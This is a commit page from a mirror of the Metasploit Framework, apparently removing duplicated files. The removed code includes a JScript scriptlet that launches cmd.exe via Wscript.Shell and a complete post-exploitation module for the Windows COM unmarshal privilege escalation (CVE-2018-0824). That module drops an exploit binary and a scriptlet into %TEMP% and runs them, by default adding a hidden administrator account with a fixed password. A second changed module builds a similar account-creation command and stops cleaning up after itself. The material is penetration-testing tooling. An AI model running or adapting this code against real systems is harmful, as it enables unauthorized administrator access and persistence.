mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-07-18 18:31:41 +02:00
Remove duplicated files
This commit is contained in:
parent
47353553e5
commit
927a29530b
@ -1,5 +0,0 @@
|
||||
");
|
||||
]]>
|
||||
</script>
|
||||
</component>
|
||||
</package>
|
@ -1,13 +0,0 @@
|
||||
<?xml version='1.0'?>
|
||||
<package>
|
||||
<component id='giffile'>
|
||||
<registration
|
||||
description='Dummy'
|
||||
progid='giffile'
|
||||
version='1.00'
|
||||
remotable='True'>
|
||||
</registration>
|
||||
<script language='JScript'>
|
||||
<![CDATA[
|
||||
var oShell = new ActiveXObject('Wscript.Shell');
|
||||
oShell.Run("cmd.exe
|
File diff suppressed because one or more lines are too long
@ -1,134 +0,0 @@
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Post
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Registry
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Windows unmarshal post exploitation',
|
||||
'Description' => %q{
|
||||
This module exploits a local privilege escalation bug which exists
|
||||
in microsoft COM for windows when it fails to properly handle serialized objects.},
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2018-0824'],
|
||||
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0824'],
|
||||
['URL', 'https://github.com/x73x61x6ex6ax61x79/UnmarshalPwn'],
|
||||
['EDB', '44906']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Nicolas Joly', # Vulnerability discovery
|
||||
'Matthias Kaiser', # Exploit PoC
|
||||
'Sanjay Gondaliya', # Modified PoC
|
||||
'Pratik Shah <pratik@notsosecure.com>' # Metasploit module
|
||||
],
|
||||
'DisclosureDate' => 'Aug 05 2018',
|
||||
'Arch' => [ARCH_X64],
|
||||
'SessionTypes' => ['meterpreter'],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('POCCMD', [true, 'The command to run from poc.sct', '/k net user msfadmin P@ssw0rd /add && net localgroup administrators msfadmin /add']),
|
||||
OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ])
|
||||
])
|
||||
end
|
||||
|
||||
def write_poc_to_target(rpoc, rpocname)
|
||||
begin
|
||||
print_warning("writing to %TEMP%")
|
||||
temppoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
|
||||
write_sct_to_target(temppoc,rpoc)
|
||||
end
|
||||
|
||||
print_good("Persistent Script written to #{temppoc}")
|
||||
temppoc
|
||||
end
|
||||
|
||||
def write_sct_to_target(temppoc,rpoc)
|
||||
fd = session.fs.file.new(temppoc, "w")
|
||||
fd.write(rpoc)
|
||||
fd.close
|
||||
end
|
||||
|
||||
def app_poc_on_target(append,rpocname)
|
||||
appendpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
|
||||
fd = session.fs.file.new(appendpoc, "a")
|
||||
fd.write(append)
|
||||
fd.close
|
||||
end
|
||||
|
||||
def create_sct_file(txt)
|
||||
print_status("Reading Payload from file #{txt}")
|
||||
::IO.read(txt)
|
||||
end
|
||||
|
||||
def write_exe_to_target(rexe, rexename)
|
||||
begin
|
||||
print_warning("writing to %TEMP%")
|
||||
temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
|
||||
write_file_to_target(temprexe,rexe)
|
||||
end
|
||||
print_good("Persistent Script written to #{temprexe}")
|
||||
temprexe
|
||||
end
|
||||
|
||||
def write_file_to_target(temprexe,rexe)
|
||||
fd = session.fs.file.new(temprexe, "wb")
|
||||
fd.write(rexe)
|
||||
fd.close
|
||||
end
|
||||
|
||||
def create_payload_from_file(exec)
|
||||
print_status("Reading Payload from file #{exec}")
|
||||
::IO.read(exec)
|
||||
end
|
||||
|
||||
def run
|
||||
rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe"
|
||||
print_status("exe name is: #{rexename}")
|
||||
rpocname = Rex::Text.rand_text_alphanumeric(10) + ".sct"
|
||||
print_status("poc name is: #{rpocname}")
|
||||
poccmd = datastore['POCCMD']
|
||||
cmdcheck = datastore['CMDCHECK']
|
||||
|
||||
rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')
|
||||
raw = create_payload_from_file rexe
|
||||
script_on_target = write_exe_to_target(raw, rexename)
|
||||
rpoc = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_header')
|
||||
rawsct = create_sct_file rpoc
|
||||
poc_on_target = write_poc_to_target(rawsct, rpocname)
|
||||
|
||||
cmdpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
|
||||
fd = session.fs.file.new(cmdpoc, "a")
|
||||
fd.write(poccmd)
|
||||
fd.close
|
||||
|
||||
rpoc1 = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_footer')
|
||||
append = create_payload_from_file rpoc1
|
||||
append_on_target = app_poc_on_target(append, rpocname)
|
||||
|
||||
print_status('Starting module...')
|
||||
print_line('')
|
||||
|
||||
command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
|
||||
print_status("Location of UnmarshalPwn.exe is: #{command}")
|
||||
command1 = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
|
||||
print_status("Location of poc.sct is: #{command1}")
|
||||
|
||||
command += " "
|
||||
command += "#{command1}"
|
||||
|
||||
print_status("Executing command : #{command}")
|
||||
command_output = cmd_exec(command)
|
||||
print_line(command_output)
|
||||
print_line('')
|
||||
|
||||
end
|
||||
end
|
@ -73,7 +73,9 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
password = Rex::Text.rand_text_alpha((rand(8) + 6))
|
||||
print_status("username = #{username}, password = #{password}")
|
||||
cmd_to_run = 'net user /add ' + username + ' ' + password
|
||||
cmd_to_run += ' > C:\\\\Windows\\\\Temp\\\\testoutput.txt'
|
||||
cmd_to_run += ' & net localgroup administrators /add ' + username
|
||||
cmd_to_run += ' >> C:\\\\Windows\\\\Temp\\\\testoutput.txt'
|
||||
print_status(cmd_to_run)
|
||||
return cmd_to_run
|
||||
end
|
||||
@ -127,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
script_template_data = ::IO.read(local_script_template_path)
|
||||
vprint_status("script_template_data.length = #{script_template_data.length}")
|
||||
full_command = 'cmd.exe /c ' + cmd_to_run
|
||||
full_command = cmd_to_run
|
||||
script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command)
|
||||
if script_data == nil
|
||||
fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
|
||||
@ -158,13 +161,13 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
vprint_status(command_output)
|
||||
print_good('Exploit completed, wait for elevated session')
|
||||
ensure_clean_destination(exploit_path)
|
||||
ensure_clean_destination(script_path)
|
||||
# ensure_clean_destination(script_path)
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
|
||||
print_good('Command failed, cleaning up')
|
||||
print_error(e.message)
|
||||
ensure_clean_destination(exploit_path)
|
||||
ensure_clean_destination(script_path)
|
||||
# ensure_clean_destination(script_path)
|
||||
end
|
||||
end
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user